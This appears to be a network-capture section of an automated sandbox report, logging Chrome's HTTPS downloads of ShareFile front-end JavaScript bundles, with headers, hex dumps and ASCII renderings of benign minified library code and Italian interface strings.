                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC1576INData Raw: 74 61 63 74 3a 22 4e 65 73 73 75 6e 20 63 6f 6e 74 61 74 74 6f 20 63 6f 72 72 69 73 70 6f 6e 64 65 20 61 6c 6c 61 20 72 69 63 65 72 63 61 22 2c 70 65 72 73 6f 6e 61 6c 3a 22 52 75 62 72 69 63 61 20 70 65 72 73 6f 6e 61 6c 65 22 2c 73 68 61 72 65 64 3a 22 52 75 62 72 69 63 61 20 63 6f 6e 64 69 76 69 73 61 22 7d 2c 63 61 6e 63 65 6c 3a 22 41 6e 6e 75 6c 6c 61 22 2c 63 61 75 74 69 6f 6e 3a 22 41 74 74 65 6e 7a 69 6f 6e 65 22 2c 63 68 65 63 6b 6f 75 74 3a 7b 61 62 6f 75 74 5f 74 6f 5f 63 68 65 63 6b 5f 6f 75 74 5f 65 78 70 69 72 65 5f 6d 65 73 73 61 67 65 3a 22 49 6c 20 66 69 6c 65 20 65 73 74 72 61 74 74 6f 20 73 63 61 64 72 c3 a0 20 74 72 61 20 32 34 20 6f 72 65 2e 20 41 6c 74 72 69 20 75 74 65 6e 74 69 20 73 61 72 61 6e 6e 6f 20 69 6e 20 67 72 61 64 6f 20
                                                                                                                                                                                                                      Data Ascii: tact:"Nessun contatto corrisponde alla ricerca",personal:"Rubrica personale",shared:"Rubrica condivisa"},cancel:"Annulla",caution:"Attenzione",checkout:{about_to_check_out_expire_message:"Il file estratto scadr tra 24 ore. Altri utenti saranno in grado
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 74 7d 7d 20 65 6c 65 6d 65 6e 74 69 22 7d 2c 66 69 6c 65 5f 6c 69 73 74 5f 6d 6f 64 61 6c 3a 7b 64 6f 6e 74 5f 73 68 6f 77 5f 61 67 61 69 6e 3a 22 4e 6f 6e 20 6d 6f 73 74 72 61 72 65 20 71 75 65 73 74 6f 20 6d 65 73 73 61 67 67 69 6f 20 69 6e 20 66 75 74 75 72 6f 22 2c 6d 6f 76 65 5f 61 77 61 79 5f 73 65 6c 65 63 74 69 6f 6e 73 3a 22 53 65 20 73 69 20 61 62 62 61 6e 64 6f 6e 61 20 6c 61 20 63 61 72 74 65 6c 6c 61 20 63 6f 72 72 65 6e 74 65 2c 20 6c 65 20 73 65 6c 65 7a 69 6f 6e 69 20 61 6e 64 72 61 6e 6e 6f 20 70 65 72 73 65 2e 22 7d 2c 67 65 6e 65 72 69 63 5f 65 72 72 6f 72 3a 22 53 69 20 c3 a8 20 76 65 72 69 66 69 63 61 74 6f 20 75 6e 20 65 72 72 6f 72 65 22 2c 67 65 74 5f 61 70 70 72 6f 76 61 6c 3a 7b 61 64 64 5f 61 70 70 72 6f 76 65 72 73 3a 22 41 67
                                                                                                                                                                                                                      Data Ascii: t}} elementi"},file_list_modal:{dont_show_again:"Non mostrare questo messaggio in futuro",move_away_selections:"Se si abbandona la cartella corrente, le selezioni andranno perse."},generic_error:"Si verificato un errore",get_approval:{add_approvers:"Ag


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      64192.168.2.174978613.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC606OUTGET /sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 188870
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Mon, 26 Aug 2024 20:27:12 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:14 GMT
                                                                                                                                                                                                                      ETag: "3eb98fc30e286b34ae6a699333c2b13c"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 3542cbb3a5773810405fca7ba271be44.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: WhPvw9krpdex6I9CoUOYrWsRhHNFEAAuqcUvG9jxcU_YlwQDHUyLIg==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC15794INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 70 75 62 6c 69 73 68 65 72 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 72 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 6e 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 7b 73 65 74 74 65 72 73 3a 5b 66
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevpublisherpilet,{})System.register(["react","react-dom","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(r,"__esModule",{value:!0}),Object.defineProperty(n,"__esModule",{value:!0}),{setters:[f
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 66 69 6c 74 65 72 28 28 65 3d 3e 2d 31 3d 3d 3d 74 2e 69 6e 64 65 78 4f 66 28 65 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 61 78 28 65 2b 28 74 7c 7c 30 29 2d 44 61 74 65 2e 6e 6f 77 28 29 2c 30 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 43 28 65 29 3f 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 3f 7b 2e 2e 2e 72 2c 71 75 65 72 79 4b 65 79 3a 65 2c 71 75 65 72 79 46 6e 3a 74 7d 3a 7b 2e 2e 2e 74 2c 71 75 65 72 79 4b 65 79 3a 65 7d 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 43 28 65 29 3f 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 3f 7b 2e 2e 2e
                                                                                                                                                                                                                      Data Ascii: (e,t){return e.filter((e=>-1===t.indexOf(e)))}function l(e,t){return Math.max(e+(t||0)-Date.now(),0)}function h(e,t,r){return C(e)?"function"==typeof t?{...r,queryKey:e,queryFn:t}:{...t,queryKey:e}:e}function f(e,t,r){return C(e)?"function"==typeof t?{...
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 3a 22 69 64 6c 65 22 2c 76 61 72 69 61 62 6c 65 73 3a 76 6f 69 64 20 30 7d 7d 63 6c 61 73 73 20 24 20 65 78 74 65 6e 64 73 20 69 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 3d 65 7c 7c 7b 7d 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 3d 5b 5d 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 49 64 3d 30 7d 62 75 69 6c 64 28 65 2c 74 2c 72 29 7b 63 6f 6e 73 74 20 6e 3d 6e 65 77 20 7a 28 7b 6d 75 74 61 74 69 6f 6e 43 61 63 68 65 3a 74 68 69 73 2c 6c 6f 67 67 65 72 3a 65 2e 67 65 74 4c 6f 67 67 65 72 28 29 2c 6d 75 74 61 74 69 6f 6e 49 64 3a 2b 2b 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 49 64 2c 6f 70 74 69 6f 6e 73 3a 65 2e 64 65 66 61 75 6c 74 4d 75 74 61 74 69 6f 6e 4f 70 74 69 6f 6e 73 28 74 29 2c 73
                                                                                                                                                                                                                      Data Ascii: :"idle",variables:void 0}}class $ extends i{constructor(e){super(),this.config=e||{},this.mutations=[],this.mutationId=0}build(e,t,r){const n=new z({mutationCache:this,logger:e.getLogger(),mutationId:++this.mutationId,options:e.defaultMutationOptions(t),s
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 6f 6e 4b 65 79 3a 74 2e 6d 75 74 61 74 69 6f 6e 4b 65 79 7d 2c 74 2e 73 74 61 74 65 29 7d 29 29 2c 73 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 76 61 72 20 6e 3b 63 6f 6e 73 74 20 69 3d 6f 2e 67 65 74 28 74 2e 71 75 65 72 79 48 61 73 68 29 3b 69 3f 69 2e 73 74 61 74 65 2e 64 61 74 61 55 70 64 61 74 65 64 41 74 3c 74 2e 73 74 61 74 65 2e 64 61 74 61 55 70 64 61 74 65 64 41 74 26 26 69 2e 73 65 74 53 74 61 74 65 28 74 2e 73 74 61 74 65 29 3a 6f 2e 62 75 69 6c 64 28 65 2c 7b 2e 2e 2e 6e 75 6c 6c 3d 3d 72 7c 7c 6e 75 6c 6c 3d 3d 28 6e 3d 72 2e 64 65 66 61 75 6c 74 4f 70 74 69 6f 6e 73 29 3f 76 6f 69 64 20 30 3a 6e 2e 71 75 65 72 69 65 73 2c 71 75 65 72 79 4b 65 79 3a 74 2e 71 75 65 72 79 4b 65 79 2c 71 75 65 72 79 48 61 73 68 3a 74 2e 71 75 65 72 79 48 61 73
                                                                                                                                                                                                                      Data Ascii: onKey:t.mutationKey},t.state)})),s.forEach((t=>{var n;const i=o.get(t.queryHash);i?i.state.dataUpdatedAt<t.state.dataUpdatedAt&&i.setState(t.state):o.build(e,{...null==r||null==(n=r.defaultOptions)?void 0:n.queries,queryKey:t.queryKey,queryHash:t.queryHas
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 6f 2c 73 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 69 2c 22 69 73 41 78 69 6f 73 45 72 72 6f 72 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 6f 2e 66 72 6f 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 2c 73 2c 61 2c 75 29 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 69 29 3b 72 65 74 75 72 6e 20 6e 2e 74 6f 46 6c 61 74 4f 62 6a 65 63 74 28 65 2c 63 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 21 3d 3d 45 72 72 6f 72 2e 70 72 6f 74 6f 74 79 70 65 7d 29 29 2c 6f 2e 63 61 6c 6c 28 63 2c 65 2e 6d 65 73 73 61 67 65 2c 74 2c 72 2c 73 2c 61 29 2c 63 2e 6e 61 6d 65 3d 65 2e 6e 61 6d 65 2c 75 26 26 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 63 2c 75
                                                                                                                                                                                                                      Data Ascii: efineProperties(o,s),Object.defineProperty(i,"isAxiosError",{value:!0}),o.from=function(e,t,r,s,a,u){var c=Object.create(i);return n.toFlatObject(e,c,(function(e){return e!==Error.prototype})),o.call(c,e.message,t,r,s,a),c.name=e.name,u&&Object.assign(c,u
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 63 3a 22 72 6f 6f 74 22 7d 5d 2c 65 2e 66 6f 72 45 61 63 68 28 6b 2c 74 68 69 73 29 2c 74 68 69 73 2e 72 65 73 65 74 28 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 74 29 7b 69 66 28 74 7c 7c 22 22 3d 3d 3d 74 29 7b 76 61 72 20 72 3d 74 5b 73 5d 3b 69 66 28 72 29 72 65 74 75 72 6e 20 72 2e 63 61 6c 6c 28 74 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 6e 65 78 74 29 72 65 74 75 72 6e 20 74 3b 69 66 28 21 69 73 4e 61 4e 28 74 2e 6c 65 6e 67 74 68 29 29 7b 76 61 72 20 6f 3d 2d 31 2c 69 3d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 66 6f 72 28 3b 2b 2b 6f 3c 74 2e 6c 65 6e 67 74 68 3b 29 69 66 28 6e 2e 63 61 6c 6c 28 74 2c 6f 29 29 72 65 74 75 72 6e 20 72 2e 76 61 6c 75 65 3d 74 5b 6f 5d 2c 72 2e 64 6f 6e 65 3d 21 31 2c 72 3b 72
                                                                                                                                                                                                                      Data Ascii: c:"root"}],e.forEach(k,this),this.reset(!0)}function F(t){if(t||""===t){var r=t[s];if(r)return r.call(t);if("function"==typeof t.next)return t;if(!isNaN(t.length)){var o=-1,i=function r(){for(;++o<t.length;)if(n.call(t,o))return r.value=t[o],r.done=!1,r;r
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 72 74 73 20 63 6f 6d 20 66 69 72 6d 20 69 6e 66 6f 20 6e 65 74 20 6f 74 68 65 72 20 70 65 72 20 72 65 63 20 73 74 6f 72 65 20 77 65 62 20 22 2c 6e 67 3a 22 20 62 69 7a 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6d 69 6c 20 6d 6f 62 69 20 6e 61 6d 65 20 6e 65 74 20 6f 72 67 20 73 63 68 20 22 2c 6e 69 3a 22 20 61 63 20 63 6f 20 63 6f 6d 20 65 64 75 20 67 6f 62 20 6d 69 6c 20 6e 65 74 20 6e 6f 6d 20 6f 72 67 20 22 2c 6e 70 3a 22 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6d 69 6c 20 6e 65 74 20 6f 72 67 20 22 2c 6e 72 3a 22 20 62 69 7a 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 69 6e 66 6f 20 6e 65 74 20 6f 72 67 20 22 2c 6f 6d 3a 22 20 61 63 20 62 69 7a 20 63 6f 20 63 6f 6d 20 65 64 75 20 67 6f 76 20 6d 65 64 20 6d 69 6c 20 6d 75 73 65 75 6d 20 6e 65 74 20 6f 72 67 20
                                                                                                                                                                                                                      Data Ascii: rts com firm info net other per rec store web ",ng:" biz com edu gov mil mobi name net org sch ",ni:" ac co com edu gob mil net nom org ",np:" com edu gov mil net org ",nr:" biz com edu gov info net org ",om:" ac biz co com edu gov med mil museum net org
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 74 75 72 6e 20 6c 28 65 5b 74 5d 29 3f 21 21 6e 26 26 64 28 65 5b 74 5d 2c 72 29 3a 65 5b 74 5d 3d 3d 3d 72 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 55 52 49 2e 68 61 73 51 75 65 72 79 28 29 20 61 63 63 65 70 74 73 20 75 6e 64 65 66 69 6e 65 64 2c 20 62 6f 6f 6c 65 61 6e 2c 20 73 74 72 69 6e 67 2c 20 6e 75 6d 62 65 72 2c 20 52 65 67 45 78 70 2c 20 46 75 6e 63 74 69 6f 6e 20 61 73 20 74 68 65 20 76 61 6c 75 65 20 70 61 72 61 6d 65 74 65 72 22 29 7d 7d 2c 69 2e 6a 6f 69 6e 50 61 74 68 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 74 3d 5b 5d 2c 72 3d 30 2c 6e 3d 30 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 6f 3d 6e 65 77 20 69 28 61
                                                                                                                                                                                                                      Data Ascii: turn l(e[t])?!!n&&d(e[t],r):e[t]===r;default:throw new TypeError("URI.hasQuery() accepts undefined, boolean, string, number, RegExp, Function as the value parameter")}},i.joinPaths=function(){for(var e=[],t=[],r=0,n=0;n<arguments.length;n++){var o=new i(a
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 22 3d 22 29 3b 6e 2b 3d 22 26 22 2b 69 2e 64 65 63 6f 64 65 51 75 65 72 79 28 75 5b 30 5d 2c 74 68 69 73 2e 5f 70 61 72 74 73 2e 65 73 63 61 70 65 51 75 65 72 79 53 70 61 63 65 29 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 25 32 36 22 29 2c 75 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 6e 2b 3d 22 3d 22 2b 69 2e 64 65 63 6f 64 65 51 75 65 72 79 28 75 5b 31 5d 2c 74 68 69 73 2e 5f 70 61 72 74 73 2e 65 73 63 61 70 65 51 75 65 72 79 53 70 61 63 65 29 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 25 32 36 22 29 29 7d 72 2b 3d 22 3f 22 2b 6e 2e 73 75 62 73 74 72 69 6e 67 28 31 29 7d 72 65 74 75 72 6e 20 72 2b 3d 69 2e 64 65 63 6f 64 65 51 75 65 72 79 28 74 2e 68 61 73 68 28 29 2c 21 30 29 7d 2c 73 2e 61 62 73 6f 6c 75 74 65 54 6f 3d 66 75 6e 63 74
                                                                                                                                                                                                                      Data Ascii: "=");n+="&"+i.decodeQuery(u[0],this._parts.escapeQuerySpace).replace(/&/g,"%26"),u[1]!==undefined&&(n+="="+i.decodeQuery(u[1],this._parts.escapeQuerySpace).replace(/&/g,"%26"))}r+="?"+n.substring(1)}return r+=i.decodeQuery(t.hash(),!0)},s.absoluteTo=funct
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 6e 21 21 24 28 65 29 7c 7c 28 74 2e 61 70 70 65 6e 64 28 4b 28 6f 2c 72 2c 69 29 2c 75 28 65 29 29 2c 21 31 29 7d 63 6f 6e 73 74 20 6c 3d 5b 5d 2c 68 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 57 2c 7b 64 65 66 61 75 6c 74 56 69 73 69 74 6f 72 3a 63 2c 63 6f 6e 76 65 72 74 56 61 6c 75 65 3a 75 2c 69 73 56 69 73 69 74 61 62 6c 65 3a 24 7d 29 3b 69 66 28 21 51 2e 69 73 4f 62 6a 65 63 74 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 64 61 74 61 20 6d 75 73 74 20 62 65 20 61 6e 20 6f 62 6a 65 63 74 22 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 72 29 7b 69 66 28 21 51 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 65 29 29 7b 69 66 28 2d 31 21 3d 3d 6c 2e 69 6e 64 65 78 4f 66 28 65 29 29 74 68 72 6f 77 20 45 72 72
                                                                                                                                                                                                                      Data Ascii: n!!$(e)||(t.append(K(o,r,i),u(e)),!1)}const l=[],h=Object.assign(W,{defaultVisitor:c,convertValue:u,isVisitable:$});if(!Q.isObject(e))throw new TypeError("data must be an object");return function f(e,r){if(!Q.isUndefined(e)){if(-1!==l.indexOf(e))throw Err


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      65192.168.2.174978513.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:12 UTC607OUTGET /sharefile-web/sharefiledev-resourcegen-pilet/0.1.44/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC591INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 1036348
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 20:27:40 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:14 GMT
                                                                                                                                                                                                                      ETag: "ef6c50332b5e5e567f6a99c5d5f87e56"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 fe106b75368b4a44b0461d7e712cd360.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: vT_zWY8V_7dPDEYeHZlEziaUbFsZAsyUUTAqC2099J67WD3uW2QNBA==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 65 73 6f 75 72 63 65 67 65 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 22 5f 5f 65 73 4d 6f 64
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevresourcegenpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},a={},s={},o={};return Object.defineProperty(a,"__esMod
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 6d 61 74 63 68 69 6e 67 20 60 73 79 73 74 65 6d 60 20 70 61 72 74 2e 22 7d 29 3b 69 66 28 6e 2e 73 65 67 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 74 2e 73 65 67 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 74 68 72 6f 77 20 6e 65 77 20 72 2e 46 6f 72 6d 61 74 41 73 73 65 72 74 69 6f 6e 45 72 72 6f 72 28 7b 6d 65 73 73 61 67 65 3a 22 54 68 65 20 6e 75 6d 62 65 72 20 6f 66 20 73 65 67 6d 65 6e 74 73 20 6f 6e 20 74 68 65 20 70 72 6f 76 69 64 65 64 20 52 49 44 20 61 6e 64 20 74 68 65 20 65 78 70 65 63 74 65 64 20 66 6f 72 6d 61 74 20 64 6f 20 6e 6f 74 20 6d 61 74 63 68 2e 22 7d 29 3b 69 66 28 6e 2e 73 65 67 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 74 2e 73 65 67 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 22 63 6f 6e 74 61 69 6e 65 72 22 21 3d 3d 74 2e 6d 61 74 63 68 54
                                                                                                                                                                                                                      Data Ascii: matching `system` part."});if(n.segments.length<t.segments.length)throw new r.FormatAssertionError({message:"The number of segments on the provided RID and the expected format do not match."});if(n.segments.length>t.segments.length&&"container"!==t.matchT
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC16384INData Raw: 5d 3d 69 7d 2c 32 38 37 39 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 5b 22 64 65 66 61 75 6c 74 22 5d 3d 76 6f 69 64 20 30 2c 74 2e 75 6e 73 61 66 65 53 74 72 69 6e 67 69 66 79 3d 73 3b 76 61 72 20 72 2c 69 3d 28 72 3d 6e 28 37 38 36 32 29 29 26 26 72 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 72 3a 7b 22 64 65 66 61 75 6c 74 22 3a 72 7d 3b 63 6f 6e 73 74 20 61 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 65 3d 30 3b 65 3c 32 35 36 3b 2b 2b 65 29 61 2e 70 75 73 68 28 28 65 2b 32 35 36 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 6c 69 63 65 28 31 29 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65
                                                                                                                                                                                                                      Data Ascii: ]=i},2879:(e,t,n)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t["default"]=void 0,t.unsafeStringify=s;var r,i=(r=n(7862))&&r.__esModule?r:{"default":r};const a=[];for(let e=0;e<256;++e)a.push((e+256).toString(16).slice(1));function s(e
                                                                                                                                                                                                                      2024-11-05 19:36:13 UTC15218INData Raw: 32 39 32 2d 36 2e 37 36 33 4c 31 37 2e 34 32 37 20 32 48 32 7a 6d 31 2e 34 33 32 2e 30 31 32 76 34 2e 33 34 37 68 32 2e 31 31 34 56 33 2e 34 39 33 48 33 2e 34 33 32 7a 6d 33 2e 35 34 37 2e 33 31 34 76 34 2e 36 36 32 6c 31 2e 30 31 32 20 33 2e 38 30 32 20 31 2e 30 32 35 20 33 2e 38 34 33 63 2e 30 31 2e 30 33 36 2e 30 34 33 2e 30 34 32 2e 32 35 38 2e 30 34 32 2e 36 34 35 20 30 20 31 2e 32 34 33 2d 2e 32 34 36 20 31 2e 37 30 34 2d 2e 37 2e 34 34 35 2d 2e 34 33 37 2e 37 31 32 2d 31 20 2e 37 37 33 2d 31 2e 36 33 33 2e 30 31 35 2d 2e 31 36 34 2e 30 32 34 2d 2e 39 36 33 2e 30 32 34 2d 32 2e 31 39 36 76 2d 31 2e 39 33 39 68 34 2e 31 30 34 63 32 2e 32 35 37 20 30 20 34 2e 31 30 33 2d 2e 30 30 38 20 34 2e 31 30 32 2d 2e 30 31 38 73 2d 2e 38 30 32 2d 32 2e 33 37 39
